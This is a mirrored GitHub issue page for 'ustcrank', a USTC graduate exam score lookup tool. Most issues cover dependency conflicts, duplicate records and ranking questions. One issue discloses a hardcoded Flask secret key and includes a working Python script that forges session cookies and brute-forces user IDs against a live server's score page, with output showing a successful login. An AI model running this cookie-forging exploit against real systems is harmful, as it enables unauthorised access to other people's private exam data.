csflyer / ustcrank Goto Github PK
View Code? Open in Web Editor NEW中科大 (USTC) 研究生入学考试成绩与排名查询
ustcrank's Introduction
ustcrank's People
Contributors
![dependabot[bot] avatar](https://avatars.githubusercontent.com/in/29110?v=4 "dependabot[bot]")
Stargazers
Watchers
Forkers
arrowooops fightforfree123 weixine-ustc-edu-cn-2020 git-flyer zuoye7788 peter5232 pzy2000 lijxdark lesliseean lclichen justinwu00 pojiang20 thevastuniverse lllbbbyyy yycunhua zyy-2020 ustchappy impigoneustcrank's Issues
requests与urllib3存在依赖问题
操作系统:centos8
python版本:3.10.3
pip版本:23.0.1
错误信息:
ERROR: Cannot install -r pip.txt (line 31) and urllib3==1.26.5 because these package versions have conflicting dependencies.
The conflict is caused by:
The user requested urllib3==1.26.5
requests 2.23.0 depends on urllib3!=1.25.0, !=1.25.1, <1.26 and >=1.21.1
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip attempt to solve the dependency conflict
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts不过在windows上安装没有出现依赖问题
我在部署时是将requirements的版本要求给删除了,不知道这个是我的环境问题还是依赖确实存在问题
已star,能把环境打个docker吗
最后的成绩好像是不计政治和外语的
应该弄一个不计政治和英语的排名就比较直观
这个准确性怎样
是不是查了分的人的数据才参与排名?所以这个排名实际上会偏高?
发现有相同考号相同成绩,但是多条记录的bug
第一页有
第二页有
还有几对重复记录,用excel发现的。。。
成绩表.xls
python不太懂,可能检查一下考号重复的记录,删掉就行了
任意用户登录漏洞
# 表单 防CSRF
app.config['SECRET_KEY'] = 'USTC'不知道你在防什么
参见官方文档
# Set the secret key to some random bytes. Keep this really secret!
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'利用poc:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2021/2/27 11:57
# @Author : Dawnnnnnn
# @Contact: [email protected]
import requests
import zlib
from itsdangerous import base64_decode
import ast
from flask.sessions import SecureCookieSessionInterface
secret_key = 'USTC'
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
def session_cookie_encoder(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error]{}".format(e)
def session_cookie_decoder(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if (secret_key == None):
compressed = False
payload = session_cookie_value
if payload.startswith(b'.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error]{}".format(e)
for i in range(103581210008000, 103581210015886):
data = {'_user_id': str(i)}
print(i)
brute_session = (session_cookie_encoder(secret_key, f"{data}"))
headers = {
"Cookie": f'session={brute_session}'
}
res = requests.get('http://8.129.43.182/score', headers=headers, allow_redirects=False)
if res.status_code == 200:
print(brute_session)
print(res.text)
break
else:
print(session_cookie_decoder(res.cookies.get('session'), secret_key))
结果:
103581210008105
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008105'}
103581210008106
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008106'}
103581210008107
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008107'}
103581210008108
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008108'}
103581210008109
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008109'}
103581210008110
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008110'}
103581210008111
{'_flashes': [('message', '要访问此页面,请先登录')], '_fresh': False, '_user_id': '103581210008111'}
103581210008112
eyJfdXNlcl9pZCI6IjEwMzU4MTIxMDAwODExMiJ9.YDpJPw.NpdKnMUxImNGxkKF8WkgePUMukY
<!DOCTYPE html>
<html>
<head>Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.